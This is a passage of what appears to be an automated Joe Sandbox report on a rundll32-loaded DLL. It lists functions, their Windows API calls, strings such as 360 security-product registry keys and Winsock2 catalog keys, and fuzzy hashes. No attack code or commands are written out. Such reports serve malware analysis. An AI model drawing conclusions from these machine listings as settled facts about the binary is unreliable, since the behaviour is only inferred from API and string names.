Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565AD
Part of subcall function 0000000180056534: _wcsicmp.MSVCRT ref: 00000001800565C8
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565DE

LeaveCriticalSection.KERNEL32(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056DCF

Strings

SOFTWARE\Wow6432Node\360SD, xrefs: 0000000180056CF4
pid, xrefs: 0000000180056CED
SOFTWARE\Wow6432Node\360EntSecurity, xrefs: 0000000180056D80
PartnerName, xrefs: 0000000180056D3F
Partner, xrefs: 0000000180056D6E
SOFTWARE\Wow6432Node\360EDRSensor, xrefs: 0000000180056D77
SOFTWARE\Wow6432Node\360Safe\Coop, xrefs: 0000000180056D46

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
API String ID: 264253324-3445957450
Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004808C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 252COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800480D3

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

GetTickCount.KERNEL32 ref: 000000018004825D
srand.MSVCRT ref: 0000000180048265
rand.MSVCRT ref: 000000018004826B
rand.MSVCRT ref: 000000018004829C

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B04B

InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,000000018000644F), ref: 0000000180048390
??3@YAXPEAX@Z.MSVCRT ref: 0000000180048415

Strings

wificheck:1, xrefs: 0000000180048215
WifiCheckQuery, xrefs: 0000000180048237
wificheck, xrefs: 00000001800481F4
360safe, xrefs: 00000001800481D5
http://%s/wcheckquery, xrefs: 00000001800482EE, 0000000180048331

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
API String ID: 2719022499-1298750920
Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066608 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000180066653
RegQueryValueExW.ADVAPI32 ref: 0000000180066696
RegCloseKey.ADVAPI32 ref: 00000001800666AA

Part of subcall function 0000000180066428: RegOpenKeyExW.ADVAPI32 ref: 0000000180066475
Part of subcall function 0000000180066428: RegQueryValueExW.ADVAPI32 ref: 00000001800664BA
Part of subcall function 0000000180066428: RegCloseKey.ADVAPI32 ref: 00000001800664D7
Part of subcall function 0000000180066428: RegOpenKeyExW.ADVAPI32 ref: 00000001800664FE
Part of subcall function 0000000180066428: memset.MSVCRT ref: 0000000180066519
Part of subcall function 0000000180066428: RegQueryValueExW.ADVAPI32 ref: 0000000180066556
Part of subcall function 0000000180066428: RegCloseKey.ADVAPI32 ref: 000000018006656C
Part of subcall function 0000000180066428: PathAppendW.SHLWAPI ref: 000000018006657E
Part of subcall function 0000000180066428: PathFileExistsW.SHLWAPI ref: 0000000180066589
Part of subcall function 0000000180066428: GetProcAddress.KERNEL32 ref: 00000001800665AF
Part of subcall function 0000000180066428: FreeLibrary.KERNEL32 ref: 00000001800665C3

RegCloseKey.ADVAPI32 ref: 00000001800666E1
GetCurrentProcess.KERNEL32 ref: 0000000180066715
OpenProcessToken.ADVAPI32 ref: 0000000180066727
CloseHandle.KERNEL32 ref: 0000000180066748
GetCommandLineW.KERNEL32 ref: 000000018006675D
wcsstr.MSVCRT ref: 000000018006678D

Strings

/elevated, xrefs: 0000000180066786
SOFTWARE\360Safe\360Ent, xrefs: 0000000180066645
ServiceCall, xrefs: 000000018006668B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
API String ID: 3868077243-983453937
Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002308 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32 ref: 0000000180002336
SHGetSpecialFolderLocation.SHELL32 ref: 000000018000234D

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

GetModuleHandleW.KERNEL32 ref: 000000018000239C
GetProcAddress.KERNEL32 ref: 00000001800023B5
GetCurrentProcess.KERNEL32 ref: 00000001800023C7
wcsstr.MSVCRT ref: 0000000180002407

Strings

\System32, xrefs: 0000000180002415
\SysWOW64, xrefs: 00000001800023FD
IsWow64Process, xrefs: 00000001800023AB
Kernel32.dll, xrefs: 0000000180002395
(x86), xrefs: 0000000180002437

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
API String ID: 3215350457-2087702655
Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800448C4 Relevance: 19.8, APIs: 13, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044908
GetTickCount.KERNEL32 ref: 00000001800449C4
srand.MSVCRT ref: 00000001800449CC
rand.MSVCRT ref: 00000001800449D2
LeaveCriticalSection.KERNEL32 ref: 0000000180044A6F
EnterCriticalSection.KERNEL32 ref: 0000000180044AE0
SysAllocString.OLEAUT32 ref: 0000000180044BF7
SysStringByteLen.OLEAUT32 ref: 0000000180044C0C
SysAllocStringByteLen.OLEAUT32 ref: 0000000180044C17
SysFreeString.OLEAUT32 ref: 0000000180044C26
LeaveCriticalSection.KERNEL32 ref: 0000000180044C63
EnterCriticalSection.KERNEL32 ref: 0000000180044CBE
LeaveCriticalSection.KERNEL32 ref: 0000000180044CD1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
String ID:
API String ID: 2388112003-0
Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060B20 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F

OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
SysFreeString.OLEAUT32 ref: 0000000180060C89

Strings

QueryFullProcessImageNameW, xrefs: 0000000180060C28
Kernel32.dll, xrefs: 0000000180060C18

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
String ID: Kernel32.dll$QueryFullProcessImageNameW
API String ID: 930578061-1170590071
Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180078A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

__C_specific_handler.MSVCRT ref: 0000000180078A39
?terminate@@YAXXZ.MSVCRT ref: 0000000180078A58
abort.MSVCRT ref: 0000000180078A72
_errno.MSVCRT ref: 0000000180078AAA
_errno.MSVCRT ref: 0000000180078B26
iswctype.MSVCRT ref: 0000000180078BF5
_errno.MSVCRT ref: 0000000180078C8D
free.MSVCRT ref: 0000000180078C9D

Strings

csm, xrefs: 0000000180078A45
f, xrefs: 0000000180078A3F

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
String ID: csm$f
API String ID: 3008409500-629598281
Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004A39C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 000000018004A3C8
SetForegroundWindow.USER32 ref: 000000018004A3DB
wcsstr.MSVCRT ref: 000000018004A3FC
memset.MSVCRT ref: 000000018004A46F
ShellExecuteW.SHELL32 ref: 000000018004A5FC

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

Part of subcall function 000000018004AF08: ShellExecuteW.SHELL32 ref: 000000018004AF73

Part of subcall function 0000000180049798: CoInitialize.OLE32 ref: 00000001800497D2
Part of subcall function 0000000180049798: CoCreateInstance.OLE32 ref: 0000000180049805
Part of subcall function 0000000180049798: IUnknown_QueryService.SHLWAPI ref: 0000000180049897

Strings

Progman, xrefs: 000000018004A3C1
http://, xrefs: 000000018004A42C
open, xrefs: 000000018004A47A, 000000018004A53B, 000000018004A5F3
p, xrefs: 000000018004A45C
Program manager, xrefs: 000000018004A3BA

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
String ID: Progman$Program manager$http://$open$p
API String ID: 1516062321-2122229248
Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056400 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 00000001800564A0

Part of subcall function 0000000180057364: RegQueryValueExW.ADVAPI32 ref: 00000001800573A9

RegCloseKey.ADVAPI32 ref: 00000001800564F2
memset.MSVCRT ref: 0000000180056572
GetModuleFileNameW.KERNEL32 ref: 0000000180056589
PathAppendW.SHLWAPI ref: 00000001800565AD
_wcsicmp.MSVCRT ref: 00000001800565C8
PathAppendW.SHLWAPI ref: 00000001800565DE

Part of subcall function 000000018000892C: GetModuleHandleW.KERNEL32 ref: 0000000180008966
Part of subcall function 000000018000892C: GetProcAddress.KERNEL32 ref: 000000018000897B
Part of subcall function 000000018000892C: RegCloseKey.ADVAPI32 ref: 00000001800089E0

PathFileExistsW.SHLWAPI ref: 00000001800565FA

Strings

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe, xrefs: 0000000180056477
safemon\360EDRSensor.exe, xrefs: 00000001800565D2

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
API String ID: 1838183957-848848004
Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005619C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 000000018005623C

Part of subcall function 0000000180057364: RegQueryValueExW.ADVAPI32 ref: 00000001800573A9

RegCloseKey.ADVAPI32 ref: 000000018005628E
memset.MSVCRT ref: 000000018005630E
GetModuleFileNameW.KERNEL32 ref: 0000000180056325
PathAppendW.SHLWAPI ref: 0000000180056349
_wcsicmp.MSVCRT ref: 0000000180056364
PathAppendW.SHLWAPI ref: 000000018005637A

Part of subcall function 000000018000892C: GetModuleHandleW.KERNEL32 ref: 0000000180008966
Part of subcall function 000000018000892C: GetProcAddress.KERNEL32 ref: 000000018000897B
Part of subcall function 000000018000892C: RegCloseKey.ADVAPI32 ref: 00000001800089E0

PathFileExistsW.SHLWAPI ref: 0000000180056396

Strings

safemon\360ExtHost.exe, xrefs: 000000018005636E
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe, xrefs: 0000000180056213

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
API String ID: 1838183957-351904165
Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052160 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 000000018005218D

Part of subcall function 0000000180030EE8: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180030F5A

??3@YAXPEAX@Z.MSVCRT ref: 00000001800521B1
??3@YAXPEAX@Z.MSVCRT ref: 0000000180052230
DeleteCriticalSection.KERNEL32(?,?,?,?,0000000180006BF2), ref: 0000000180052261

Strings

SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5, xrefs: 00000001800523AF
Num_Catalog_Entries, xrefs: 0000000180052346
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters, xrefs: 00000001800524C4
%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018005235A, 0000000180052631
Num_Catalog_Entries64, xrefs: 000000018005233F
%s\NameSpace_Catalog5\Catalog_Entries64\%012d, xrefs: 0000000180052353

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@$CriticalDeleteSection
String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
API String ID: 1297904149-2676930693
Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003A8D4 Relevance: 16.6, APIs: 11, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
